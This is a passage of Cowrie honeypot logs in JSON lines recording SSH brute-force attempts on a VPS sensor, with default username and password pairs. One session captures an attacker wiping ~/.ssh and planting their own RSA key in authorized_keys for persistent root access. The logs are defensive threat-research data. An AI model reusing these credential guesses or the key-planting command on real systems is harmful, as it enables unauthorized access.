m@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:40:18.376727Z","src_ip":"212.227.235.229","session":"cb44484b5714"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:40:18.741855Z","src_ip":"212.227.235.229","session":"cb44484b5714"}
{"eventid":"cowrie.login.failed","username":"apps","password":"apps123","message":"login attempt [apps/apps123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:40:19.161655Z","src_ip":"212.227.235.229","session":"3fa08b5bad04"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:40:19.824109Z","src_ip":"212.227.235.229","session":"cb44484b5714"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41984,"dst_ip":"1.2.3.4","dst_port":22,"session":"d69edac25591","protocol":"ssh","message":"New connection: 212.227.235.229:41984 (1.2.3.4:22) [session: d69edac25591]","sensor":"my-vps","timestamp":"2025-09-09T05:40:19.904125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:40:19.905677Z","src_ip":"212.227.235.229","session":"d69edac25591"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:40:19.985527Z","src_ip":"212.227.235.229","session":"d69edac25591"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:40:20.310108Z","src_ip":"212.227.235.229","session":"d69edac25591"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:40:20.342046Z","src_ip":"212.227.235.229","session":"3fa08b5bad04"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:40:20.392594Z","src_ip":"212.227.235.229","session":"74f9e22aca9b"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:40:20.393502Z","src_ip":"212.227.235.229","session":"d69edac25591"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":62503,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a5b004d204e","protocol":"ssh","message":"New connection: 213.6.203.226:62503 (1.2.3.4:22) [session: 6a5b004d204e]","sensor":"my-vps","timestamp":"2025-09-09T05:40:59.060737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:40:59.061815Z","src_ip":"213.6.203.226","session":"6a5b004d204e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:40:59.129766Z","src_ip":"213.6.203.226","session":"6a5b004d204e"}
{"eventid":"cowrie.login.failed","username":"dev","password":"!QAZ2wsx","message":"login attempt [dev/!QAZ2wsx] failed","sensor":"my-vps","timestamp":"2025-09-09T05:40:59.441092Z","src_ip":"213.6.203.226","session":"6a5b004d204e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:41:00.511122Z","src_ip":"213.6.203.226","session":"6a5b004d204e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49640,"dst_ip":"1.2.3.4","dst_port":22,"session":"912aa97bfd25","protocol":"ssh","message":"New connection: 217.72.205.35:49640 (1.2.3.4:22) [session: 912aa97bfd25]","sensor":"my-vps","timestamp":"2025-09-09T05:41:02.499381Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:41:02.500465Z","src_ip":"217.72.205.35","session":"912aa97bfd25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58618,"dst_ip":"1.2.3.4","dst_port":22,"session":"16ef048c6422","protocol":"ssh","message":"New connection: 212.227.235.229:58618 (1.2.3.4:22) [session: 16ef048c6422]","sensor":"my-vps","timestamp":"2025-09-09T05:41:14.892577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:41:14.893667Z","src_ip":"212.227.235.229","session":"16ef048c6422"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:41:14.974200Z","src_ip":"212.227.235.229","session":"16ef048c6422"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Admin@123","message":"login attempt [ubuntu/Admin@123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:41:15.328551Z","src_ip":"212.227.235.229","session":"16ef048c6422"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:41:16.409562Z","src_ip":"212.227.235.229","session":"16ef048c6422"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50784,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f6de9c381a3","protocol":"ssh","message":"New connection: 212.227.235.229:50784 (1.2.3.4:22) [session: 0f6de9c381a3]","sensor":"my-vps","timestamp":"2025-09-09T05:41:24.651253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:41:24.652205Z","src_ip":"212.227.235.229","session":"0f6de9c381a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:41:24.858505Z","src_ip":"212.227.235.229","session":"0f6de9c381a3"}
{"eventid":"cowrie.login.failed","username":"raspberry","password":"Welcome1","message":"login attempt [raspberry/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T05:41:26.257956Z","src_ip":"212.227.235.229","session":"0f6de9c381a3"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:41:27.429933Z","src_ip":"212.227.235.229","session":"0f6de9c381a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64327,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b1dd2f6624d","protocol":"ssh","message":"New connection: 212.227.235.229:64327 (1.2.3.4:22) [session: 7b1dd2f6624d]","sensor":"my-vps","timestamp":"2025-09-09T05:41:31.776956Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:41:31.777800Z","src_ip":"212.227.235.229","session":"7b1dd2f6624d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:41:31.917681Z","src_ip":"212.227.235.229","session":"7b1dd2f6624d"}
{"eventid":"cowrie.login.failed","username":"apps","password":"apps123","message":"login attempt [apps/apps123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:41:32.475335Z","src_ip":"212.227.235.229","session":"7b1dd2f6624d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:41:33.599157Z","src_ip":"212.227.235.229","session":"7b1dd2f6624d"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":49087,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bcbbc2f248f","protocol":"ssh","message":"New connection: 213.6.203.226:49087 (1.2.3.4:22) [session: 5bcbbc2f248f]","sensor":"my-vps","timestamp":"2025-09-09T05:42:05.816239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:42:05.816992Z","src_ip":"213.6.203.226","session":"5bcbbc2f248f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:42:05.896042Z","src_ip":"213.6.203.226","session":"5bcbbc2f248f"}
{"eventid":"cowrie.login.success","username":"root","password":"09N1RCa1Hs31","message":"login attempt [root/09N1RCa1Hs31] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:42:06.235621Z","src_ip":"213.6.203.226","session":"5bcbbc2f248f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:42:06.404086Z","src_ip":"213.6.203.226","session":"5bcbbc2f248f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:42:06.404771Z","src_ip":"213.6.203.226","session":"5bcbbc2f248f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:42:06.405888Z","src_ip":"213.6.203.226","session":"5bcbbc2f248f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:06.481655Z","src_ip":"213.6.203.226","session":"5bcbbc2f248f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:42:06.730250Z","src_ip":"213.6.203.226","session":"5bcbbc2f248f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:42:06.730926Z","src_ip":"213.6.203.226","session":"5bcbbc2f248f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:42:06.807428Z","src_ip":"213.6.203.226","session":"5bcbbc2f248f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:06.808296Z","src_ip":"213.6.203.226","session":"5bcbbc2f248f"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":53290,"dst_ip":"1.2.3.4","dst_port":22,"session":"87e3b9b0f6a2","protocol":"ssh","message":"New connection: 213.6.203.226:53290 (1.2.3.4:22) [session: 87e3b9b0f6a2]","sensor":"my-vps","timestamp":"2025-09-09T05:42:06.867398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:42:06.868137Z","src_ip":"213.6.203.226","session":"87e3b9b0f6a2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:42:06.934928Z","src_ip":"213.6.203.226","session":"87e3b9b0f6a2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:42:07.244062Z","src_ip":"213.6.203.226","session":"87e3b9b0f6a2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:08.313508Z","src_ip":"213.6.203.226","session":"87e3b9b0f6a2"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":59086,"dst_ip":"1.2.3.4","dst_port":22,"session":"3442433de05d","protocol":"ssh","message":"New connection: 213.6.203.226:59086 (1.2.3.4:22) [session: 3442433de05d]","sensor":"my-vps","timestamp":"2025-09-09T05:42:08.379393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:42:08.380056Z","src_ip":"213.6.203.226","session":"3442433de05d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:42:08.446934Z","src_ip":"213.6.203.226","session":"3442433de05d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:42:08.755847Z","src_ip":"213.6.203.226","session":"3442433de05d"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:08.823982Z","src_ip":"213.6.203.226","session":"3442433de05d"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:08.829410Z","src_ip":"213.6.203.226","session":"5bcbbc2f248f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54236,"dst_ip":"1.2.3.4","dst_port":22,"session":"e12dfc06ce1f","protocol":"ssh","message":"New connection: 212.227.235.229:54236 (1.2.3.4:22) [session: e12dfc06ce1f]","sensor":"my-vps","timestamp":"2025-09-09T05:42:13.022878Z"}
